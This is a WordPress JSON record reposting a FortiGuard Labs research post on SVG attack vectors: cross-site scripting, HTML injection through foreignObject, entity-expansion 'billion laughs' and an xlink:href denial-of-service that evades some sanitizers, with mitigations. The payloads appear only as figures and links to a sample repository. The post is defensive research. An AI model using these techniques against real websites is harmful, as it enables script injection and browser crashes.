{"id":16824,"date":"2019-11-07T09:40:06","date_gmt":"2019-11-07T17:40:06","guid":{"rendered":"https:\/\/www.palada.net\/index.php\/2019\/11\/07\/news-10563\/"},"modified":"2019-11-07T09:40:06","modified_gmt":"2019-11-07T17:40:06","slug":"news-10563","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2019\/11\/07\/news-10563\/","title":{"rendered":"Anatomy of Scalable Vector Graphics (SVG) Attack Surface on the Web"},"content":{"rendered":"<div class=\"aem-Grid aem-Grid--12 aem-Grid--default--12\">\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p><b><i>A FortiGuard Labs Threat Research Report<\/i><\/b><\/p>\n<h2>Introduction<\/h2>\n<p>Over the past few weeks, Fortinet&#8217;s FortiGuard Labs has been assessing web applications with embedded SVG images. As a result, we found a number of common issues in the web applications that we have examined. In this blog post, we will briefly talk about the nature of SVG and the common attack surfaces for SVG images that we have seen so far.<\/p>\n<p>The following list is a summary of the common SVG attack vectors that we have observed over time:<\/p>\n<ul>\n<li>Cross-Site Scripting<\/li>\n<li>HTML Injection<\/li>\n<li>XML Entity Processing \u2013 Billion Laughs Attack<\/li>\n<li>Denial of Service \u2013 The New SVG Billion Laughs Attack<\/li>\n<\/ul>\n<h2>SVG on the Web<\/h2>\n<p>SVG, which stands for <b>Scalable Vector Graphics<sup>[1]<\/sup><\/b>, is an XML-based vector image format for two-dimensional graphics with support for interactivity and animation. SVG images and their behaviors are defined in XML text files. They can be created and edited with any text editor, as well as with drawing software. All major modern web browsers have SVG rendering support.<\/p>\n<p>Let\u2019s look at an example to get a better understanding of SVG images. Below, we have written some code to render an SVG image:<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn aem-GridColumn--default--12\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/scalable-vector-graphics-attack-surface-anatomy\/_jcr_content\/root\/responsivegrid\/image_1192764442.img.png\/1573069642100\/svg-one.png\" alt=\"Figure 1: Code snippet of simple.svg\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 1: Code snippet of simple.svg<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>We then saved this image as <a href=\"https:\/\/raw.githubusercontent.com\/fortiguard-lion\/svg_test\/master\/simple.svg\"><b>simple.svg<\/b><\/a> that can then be opened directly or included in an img\/image\/object\/embed HTML tag:<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--5 aem-GridColumn--offset--default--3\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/scalable-vector-graphics-attack-surface-anatomy\/_jcr_content\/root\/responsivegrid\/image_1265414755.img.png\/1573069761101\/svg-two.png\" alt=\"Figure 2: Image rendered from code\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 2: Image rendered from code<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>Figure 2 shows the image generated via the code shown in Figure 1. It is a <b>rect<\/b> element that tells the browser to render a red rectangle in position x, y (100, 100) \u2013 i.e. width and height.<\/p>\n<h2>SVG in the Wild<\/h2>\n<p>Though SVG provides flexibility that enables the creation of more dynamic web content, it also introduces additional security risks. In this next section we will discuss the common attack vectors that we observed in a number of major websites we encountered online.<\/p>\n<h3><b>1.\u00a0Cross-Site Scripting<\/b><\/h3>\n<p>All aspects of an SVG document can be accessed and manipulated using scripts in a way similar to HTML. The default scripting language is ECMAScript (closely related to JavaScript) and there are defined Document Object Model (DOM) objects for every SVG element and attribute. Scripts are enclosed in &lt;script&gt; elements.<\/p>\n<p>This means that if a web server allows a user to upload an arbitrary SVG image, it is then vulnerable to a Cross-Site Scripting<sup>[2]<\/sup> attack. Here we have put the script inside the image:<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn aem-GridColumn--default--12\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/scalable-vector-graphics-attack-surface-anatomy\/_jcr_content\/root\/responsivegrid\/image_38269823.img.png\/1573076826071\/svg-three.png\" alt=\"Figure 3: Code snippet of xss.svg\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 3: Code snippet of xss.svg<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>Here is the compromised image that we saved as <a href=\"https:\/\/raw.githubusercontent.com\/fortiguard-lion\/svg_test\/master\/xss.svg\"><b>xss.svg<\/b><\/a> and then opened directly:<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn--default--9 aem-GridColumn aem-GridColumn--offset--default--1\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/scalable-vector-graphics-attack-surface-anatomy\/_jcr_content\/root\/responsivegrid\/image_737747699.img.png\/1573076863256\/svg-four.png\" alt=\"Figure 4: Cross-Site Scripting triggered via directly accessing file\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 4: Cross-Site Scripting triggered via directly accessing file<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>Here is what happens when it is linked to an html page:<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn aem-GridColumn--default--12\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/scalable-vector-graphics-attack-surface-anatomy\/_jcr_content\/root\/responsivegrid\/image_595481722.img.png\/1573076944019\/svg-five.png\" alt=\"Figure 5: Cross-Site Scripting triggered via link file\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 5: Cross-Site Scripting triggered via link file<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>The Javascript code is executed within browser context, which means an attacker can use this compromised file to perform malicious activities, such as stealing your information.<\/p>\n<h3><b>2.\u00a0HTML Injection<\/b><\/h3>\n<p>In some contexts, the XSS payload is sanitized. However, an SVG image still has a feature that allows us to inject HTML code. As mentioned before, the SVG is an XML-based vector image so we cannot simply put HTML into it as the syntax of the XML will be broken.<\/p>\n<p>To avoid this, SVG has an element known as <b>foreignObject<\/b> that allows the inclusion of elements from a different XML namespace. In the context of a browser, this would most likely be (X)HTML.<\/p>\n<p>Let\u2019s take a look at the <a href=\"https:\/\/raw.githubusercontent.com\/fortiguard-lion\/svg_test\/master\/html.svg\"><b>html.svg<\/b><\/a> image:<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn aem-GridColumn--default--12\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/scalable-vector-graphics-attack-surface-anatomy\/_jcr_content\/root\/responsivegrid\/image_207500084.img.png\/1573077200869\/svg-six.png\" alt=\"Figure 6: Code snippet of html.svg\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 6: Code snippet of html.svg<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>When we add the <b>body tag<\/b> along with an <b>XHTML namespace<\/b> inside a <b>foreignObject<\/b>, the namespace declaration is provided by the <b>xmlns<\/b> attribute. As a result, the body tag and all its child tags are interpreted by the user agent as belonging to XHTML. Therefore, we are able to render any XHTML code from the SVG to the page:<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn aem-GridColumn--default--12\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/scalable-vector-graphics-attack-surface-anatomy\/_jcr_content\/root\/responsivegrid\/image_645367797.img.png\/1573077249705\/svg-seven.png\" alt=\"Figure 7: HTML Injection vulnerability\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 7: HTML Injection vulnerability<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>This ability to run any HTML code means we can simply perform an attack like phishing, bypass same-origin, CSRF, etc. from inside the compromised SVG image.<\/p>\n<h3><b>3.\u00a0XML Entity Processing \u2013 Billion Laughs Attack<\/b><\/h3>\n<p>Since SVG is an XML-based vector image, it therefore allows the <b>Entity to be included <\/b>function. Entities are used to define shortcuts to special characters and can be declared to be internal or external.<\/p>\n<p style=\"margin-left: 40.0px;\"><b>An Internal Entity can be declared via the following syntax:<\/b><\/p>\n<p style=\"margin-left: 40.0px;\">&lt;!ENTITY entity-name &quot;entity-value&quot;&gt;<\/p>\n<p style=\"margin-left: 40.0px;\"><b>An External Entity can be declared via the following syntax:<\/b><\/p>\n<p style=\"margin-left: 40.0px;\">&lt;!ENTITY entity-name SYSTEM &quot;URI\/URL&quot;&gt;<\/p>\n<p>This External Entity function can be abused to leak internal data in the case of a file being parsed by a defective XML parser. Since we mostly work with modern browsers, we assumed that any available parser has already been well tested by fuzzers and should therefore be less vulnerable. Because of this, we will only talk about the abuse of an Internal Entity instead.<\/p>\n<p>Inside <a href=\"https:\/\/raw.githubusercontent.com\/fortiguard-lion\/svg_test\/master\/entity.svg\"><b>entity.svg<\/b><\/a>:\u00a0<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn aem-GridColumn--default--12\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/scalable-vector-graphics-attack-surface-anatomy\/_jcr_content\/root\/responsivegrid\/image_21415921.img.png\/1573077477947\/svg-eight.png\" alt=\"Figure 8: Code snippet of entity.svg\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 8: Code snippet of entity.svg<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>As seen above, we defined the Entity <b>lab<\/b> at line 2 and then we call it inside the SVG element. Figure 9 shows the result:<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn aem-GridColumn--default--12\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/scalable-vector-graphics-attack-surface-anatomy\/_jcr_content\/root\/responsivegrid\/image_247678361.img.png\/1573077517905\/svg-nine.png\" alt=\"Figure 9: Entity lab loaded into the page\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 9: Entity lab loaded into the page<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>It works! Let try another example \u2013 <a href=\"https:\/\/raw.githubusercontent.com\/fortiguard-lion\/svg_test\/master\/entity_2.svg\"><b>entity_2.svg<\/b><\/a>:<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn aem-GridColumn--default--12\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/scalable-vector-graphics-attack-surface-anatomy\/_jcr_content\/root\/responsivegrid\/image_762445167.img.png\/1573077553705\/svg-ten.png\" alt=\"Figure 10: Code snippet of entity_2.svg\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 10: Code snippet of entity_2.svg<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>Here is the result:<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn aem-GridColumn--default--12\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/scalable-vector-graphics-attack-surface-anatomy\/_jcr_content\/root\/responsivegrid\/image_1561035158.img.png\/1573077584355\/svg-eleven.png\" alt=\"Figure 11: Entity lab2 loaded into the page\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 11: Entity lab2 loaded into the page<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>As can be seen, the text is being duplicated, which indicates that we can perform The Billion Laughs attack using an Entity tag!<\/p>\n<p>The Billion Laughs Attack<sup>[3]<\/sup> is a type of denial-of-service (DoS) attack which is aimed at parsers of XML documents. It is also referred to as an XML bomb or exponential entity expansion attack.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn aem-GridColumn--default--12\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/scalable-vector-graphics-attack-surface-anatomy\/_jcr_content\/root\/responsivegrid\/image_184096815.img.png\/1573077631977\/svg-twelve.png\" alt=\"Figure 12: Code snippet of billion_laughs.svg\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 12: Code snippet of billion_laughs.svg<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>Our browser took 4-5 seconds to response when parsing this <a href=\"https:\/\/raw.githubusercontent.com\/fortiguard-lion\/svg_test\/master\/billion_laughs.svg\">billion_laughs.svg<\/a>. That\u2019s because most modern browsers are already aware of this attack and can address it during rendering so it does not pose a security risk.<\/p>\n<h3><b>4.\u00a0Denial of Service \u2013 The New SVG Billion Laughs Attack<\/b><\/h3>\n<p>As seen in the previous section, the Billion Laughs Attack slows down the browser for around 4-5 secs to address the attack. Unfortunately, there is another way to perform the Billion Laughs via SVG image that can bypass those defenses<\/p>\n<p>This time, we will use <b>xlink:href<\/b> instead of XML Entity. Let\u2019s look at the payload for <a href=\"https:\/\/raw.githubusercontent.com\/fortiguard-lion\/svg_test\/master\/xlink_laughs.svg\"><b>xlink_laughs.svg<\/b><\/a>:<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn--default--9 aem-GridColumn aem-GridColumn--offset--default--1\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/scalable-vector-graphics-attack-surface-anatomy\/_jcr_content\/root\/responsivegrid\/image.img.png\/1573077686307\/svg-thirteen.png\" alt=\"Figure 13: Code snippet of xlink_laughs.svg\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 13: Code snippet of xlink_laughs.svg<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>The <b>xlink:href<\/b> attribute defines a reference to a resource as a reference IRI. The exact meaning of that link depends on the context of each element using it.<\/p>\n<p>The <b>&lt;use&gt;<\/b> element takes nodes from within the SVG document and duplicates them somewhere else.<\/p>\n<p>By defining the circle element in <b>a0<\/b>, we call the <b>&lt;use&gt; element<\/b> with the attribute <b>xlink:href<\/b> in <b>a1, a2, a3<\/b>\u2026 to clone the circle again, again, and again. Here is the result:<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn aem-GridColumn--default--12\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/scalable-vector-graphics-attack-surface-anatomy\/_jcr_content\/root\/responsivegrid\/image_668706681.img.png\/1573077756087\/svg-fourteen.png\" alt=\"Figure 14: Billion Laughs Attack via xlink:href when parsing the malicious SVG\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 14: Billion Laughs Attack via xlink:href when parsing the malicious SVG<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>Note that in a worst case scenario, most modern browsers can be crashed, or at least become unresponsive when trying to render this SVG image as an avatar, image, chat, etc. on a website.<\/p>\n<p>Interestingly, the SVG image shown in Figure 13 is also not caught by some open source SVG\/XML sanitizers when we tested them. As a result, this is lesser known malformed SVG is likely to be able to trigger a denial-of-service.<\/p>\n<h2>Conclusion<\/h2>\n<p>In conclusion, SVGs are more like HTML than simply being an image. As a result, we recommend that web developers not load any SVG as an object or iframe if possible. The web administrator should also limit the file types that can be uploaded.<\/p>\n<p>Otherwise, any untrusted SVG should be sanitized before being uploaded onto the server:<\/p>\n<ul>\n<li>Restrict dangerous tags, such as script, foreignObject, etc.<\/li>\n<li>Restrict loading resources from an external link inside an SVG image<\/li>\n<li>Limit expansion inside an SVG image<\/li>\n<\/ul>\n<p>The following table compares browser vulnerabilities to malicious SVG files when those files are opened directly.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn aem-GridColumn--default--12\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/scalable-vector-graphics-attack-surface-anatomy\/_jcr_content\/root\/responsivegrid\/image_365483115.img.png\/1573077912499\/screen-shot-2019-11-06-at-2.04.58-pm.png\" alt=\"SVG IMG\"\/>         <\/noscript>                   <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>The SVG samples used in this report can be found at our Github site: <a href=\"https:\/\/github.com\/fortiguard-lion\/svg_test\/\">https:\/\/github.com\/fortiguard-lion\/svg_test\/<\/a><\/p>\n<h2>Solution<\/h2>\n<p><b>FortiGuard Labs has released the following IPS signatures that cover the vulnerabilities mentioned:<\/b><\/p>\n<p>TYPO3.CMS.Upload.XSS<\/p>\n<p>WordPress.Plugin.SafeSVG.DoS<\/p>\n<p>Drupal.Module.SVGSanitizer.DoS<\/p>\n<p>ImageMagick.Convert.LibXML.DoS<\/p>\n<p style=\"text-align: center;\">-== FortiGuard Lion Team ==-<\/p>\n<p><i>Learn more about\u00a0<a href=\"https:\/\/www.fortinet.com\/fortiguard\/threat-intelligence\/threat-research.html?utm_source=nreleaseblog&amp;utm_campaign=2018-q2-fortiguardlabs-cta\">FortiGuard Labs<\/a>\u00a0and the FortiGuard Security Services\u00a0<a href=\"https:\/\/www.fortinet.com\/support-and-training\/support-services\/fortiguard-security-subscriptions.html?utm_source=blog&amp;utm_campaign=2018-blog-security-services\">portfolio<\/a>.\u00a0<a href=\"https:\/\/www.fortinet.com\/fortiguard\/threat-intelligence\/threat-research.html?utm_source=nreleaseblog&amp;utm_campaign=2018-q2-fortiguardlabs-cta\">Sign up<\/a>\u00a0for our weekly FortiGuard Threat Brief.<\/i><\/p>\n<p><i>Read about the FortiGuard\u00a0<a href=\"https:\/\/www.fortinet.com\/support-and-training\/support-services\/fortiguard-security-subscriptions\/security-rating.html?utm_source=blog&amp;utm_campaign=2018-blog-security-rating-service\">Security Rating Service<\/a>, which provides security audits and best practices.<\/i><\/p>\n<h2>References<\/h2>\n<p>[1] W3C, \u201cScalable Vector Graphics\u201d <a href=\"https:\/\/www.w3.org\/TR\/SVG2\/\">https:\/\/www.w3.org\/TR\/SVG2\/<\/a> (02 September, 2019)<br \/> [2] OWASP, \u201cThe Image that called me\u201d <a href=\"https:\/\/www.owasp.org\/images\/0\/03\/Mario_Heiderich_OWASP_Sweden_The_image_that_called_me.pdf\">https:\/\/www.owasp.org\/images\/0\/03\/Mario_Heiderich_OWASP_Sweden_The_image_that_called_me.pdf<\/a> (02 September, 2019)<br \/> [3] Blackhat, \u201cExploiting Browsers without Image Parsing Bugs\u201d <a href=\"https:\/\/www.blackhat.com\/docs\/us-14\/materials\/us-14-DeGraaf-SVG-Exploiting-Browsers-Without-Image-Parsing-Bugs.pdf\">https:\/\/www.blackhat.com\/docs\/us-14\/materials\/us-14-DeGraaf-SVG-Exploiting-Browsers-Without-Image-Parsing-Bugs.pdf<\/a> (02 September, 2019)<\/p>\n<\/p><\/div>\n<div class=\"raw-import aem-GridColumn aem-GridColumn--default--12\">\n<div class=\"text-container\">\n<div id=\"om-qxx1b0gslklfu2kjckea-holder\"><\/div>\n<\/p><\/div>\n<\/p><\/div>\n<\/p><\/div>\n<p><a href=\"http:\/\/feedproxy.google.com\/~r\/fortinet\/blog\/threat-research\/~3\/tSFgpsLgsgM\/scalable-vector-graphics-attack-surface-anatomy.html\" target=\"bwo\" >http:\/\/feeds.feedburner.com\/fortinet\/blog\/threat-research<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"\/blog\/threat-research\/scalable-vector-graphics-attack-surface-anatomy\/_jcr_content\/root\/responsivegrid\/image_1192764442.img.png\/1573069642100\/svg-one.png\"\/><br \/>Learn about the common attack surfaces for SVG images observed by the FortiGuard Labs team as they assess web applications with embedded SVG images.&lt;img src=&#8221;http:\/\/feeds.feedburner.com\/~r\/fortinet\/blog\/threat-research\/~4\/tSFgpsLgsgM&#8221; height=&#8221;1&#8243; width=&#8221;1&#8243; alt=&#8221;&#8221;\/&gt;<\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10424,10378],"tags":[],"class_list":["post-16824","post","type-post","status-publish","format-standard","hentry","category-fortinet","category-security"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/16824","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=16824"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/16824\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=16824"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=16824"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=16824"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}